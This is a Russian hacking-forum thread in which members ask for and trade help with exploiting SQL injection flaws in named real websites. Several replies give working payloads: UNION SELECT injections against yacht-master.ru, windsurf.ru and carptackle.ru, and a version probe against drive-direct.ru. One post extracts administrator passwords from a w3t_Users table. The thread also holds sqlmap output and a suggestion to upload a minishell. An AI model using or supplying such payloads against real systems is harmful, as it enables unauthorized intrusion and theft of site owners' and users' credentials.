Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Если есть права на запись, то можно залить минишелл.
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Тут зависит от версии Phpmyadmin. Узнаешь версию и идешь в гугл за поиском експлоита, в гугле так и пишешь:exploit phpmyadmin
    внекоторых версиях встречается такая уязвимость как php-Injection
     
    _________________________
  3. rogatiy

    rogatiy New Member

    Joined:
    3 Mar 2013
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    http://www.drive-direct.ru/?go=servis&catid=38

    Руками крутить скули, к сожалению, уже разучился. Havij принимает это за Blind-inj, а потом не может вытащить не таблицы, ни колонки. Вопрос - действительно ли это блайнд-инжект и крутится ли он?
     
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Инъекция тут точно есть, 7 колонок в запросе.

    Есть WAF. Пока даже версию не смог получить. Но пытаюсь.

    Ну в общем это 3-я ветка MySQL

    Code:
    http://www.drive-direct.ru/?go=servis&catid=38+and+if((left([COLOR=Yellow]version()[/COLOR],1)=[COLOR=Yellow]3[/COLOR]),1,0)=1--  TRUE
     
    _________________________
    #22344 BigBear, 22 Jul 2013
    Last edited: 22 Jul 2013
  5. vanban

    vanban New Member

    Joined:
    4 Jul 2013
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Бд: MySQL 3
    Название: 1gb_drivedir
     
  6. kcash

    kcash New Member

    Joined:
    6 Apr 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Вобщем постоянно натыкаюсь на одно и то же.. что хавиж, что sqlmap.. находим time-based инъекцию. но потом нещадно губит надежды нежеланием даже на уровне раскрытия таблиц. Т.е. иммя базы сказала, и вроде должно пойти но, не может почему-то.. то что у всех так установлены права на sql юзеров не поверю

    [16:34:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [16:34:43] [INFO] retrieved:
    [16:34:46] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
    [16:35:01] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

    [16:35:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [16:35:03] [CRITICAL] unable to retrieve the number of database users

    это я юзерс хотел посмотреть.... собственно с этого всё начинается
     
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    При заходе на опредленную страничку, ничего не добавляя мне выкидывает "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/search.php on line 14" Можно ли это как нибудь использовать?
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    нет!
     
    1 person likes this.
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    хорошо) а даст ли нам что нибудь, если при вводе в строку поиска ковычки, нам выдаст ошибку sql syntax:
    "DB query error.
    Details: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 3
    Please try later."
    Какие дальше стоит пути рассматривать? сразу искать что нибудь другое? или можно тут что либо попробовать?
     
  10. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    526
    Likes Received:
    253
    Reputations:
    32
    ордер бай потом селект
    если фильтры не режут
     
    1 person likes this.
  11. [AVT]

    [AVT] Member

    Joined:
    20 Dec 2007
    Messages:
    37
    Likes Received:
    16
    Reputations:
    1
    Что-то интересное:
    senpolia.info/news/79'/
     
  12. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    По той ссылке нет ничего.
    Но кое что забавное есть в другом месте:

    http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/
    http://senpolia.info/catalog/1111111111111111111111111111f1111111111111/sad

    вылетают sql ошибки. Притом если поставить в запрос один из символов '(),=+ ошибки уже нет
     
  13. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Как вариант.

    [​IMG]
     
    2 people like this.
  14. rogatiy

    rogatiy New Member

    Joined:
    3 Mar 2013
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    http://www.yacht-master.ru/board/viewphoto.php?p=203
    http://www.windsurf.ru/board/viewphoto.php?&p=4885

    В обоих случаях морковка вытягивает блайндом имя базы и затухает - таблицы вытащить не удаётся. Крутится ли оно руками?
     
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Вполне крутабельны.

    1-ый линк:
    Code:
    http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,@@version,3,4,5,6,7,8+--+
    2-ой линк:

    Code:
    http://www.windsurf.ru/board/viewphoto.php?&p=-99999'+union+select+1,@@version,3,4,5,6,7,8+--+
     
    _________________________
  16. rogatiy

    rogatiy New Member

    Joined:
    3 Mar 2013
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    Благодарю! Сработало.
    Хотелось бы вытащить аккаунты администраторов, благо группа для них имеется отдельная.
    Code:
    http://www.yacht-master.ru/board/viewphoto.php?p=-999999'+union+select+1,U_Status,3,4,5,6,7,8+from+w3t_Users+--+
    Как отфильтровать U_Username по U_Status='Administrator'?

    Ответ:
    Code:
    http://yacht-master.ru/board/viewphoto.php?&p=-99999'+union+select+1,U_Password,3,4,5,6,7,8+from+w3t_Users+where+U_Status='Administrator'+--+
     
    #22356 rogatiy, 23 Jul 2013
    Last edited: 23 Jul 2013
  17. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    526
    Likes Received:
    253
    Reputations:
    32
    используй where
     
  18. rogatiy

    rogatiy New Member

    Joined:
    3 Mar 2013
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    http://carptackle.ru/plugins/shop/features.php?product=1573
    MySQL >5, есть information_schema
    Морковка видит blind-inj, не может вытащить user_login из msk_user. Помогите, пожалуйста, подобрать кол-во колонок
     
  19. antiaudomain

    antiaudomain Banned

    Joined:
    19 May 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    39 же
    Code:
    http://carptackle.ru/plugins/shop/features.php?product=1573+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--
    
    смотри тайтл
     
  20. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    Есть скуля, на сайте таблица размеров в 2 млн записей
    Показывает 2млн записей
    Пробую дампить через LIMIT 0,1, дохожу до 80(LIMIT 80,1) и все, дальше данные не выводяться, в чем может быть проблема?
     
Thread Status:
Not open for further replies.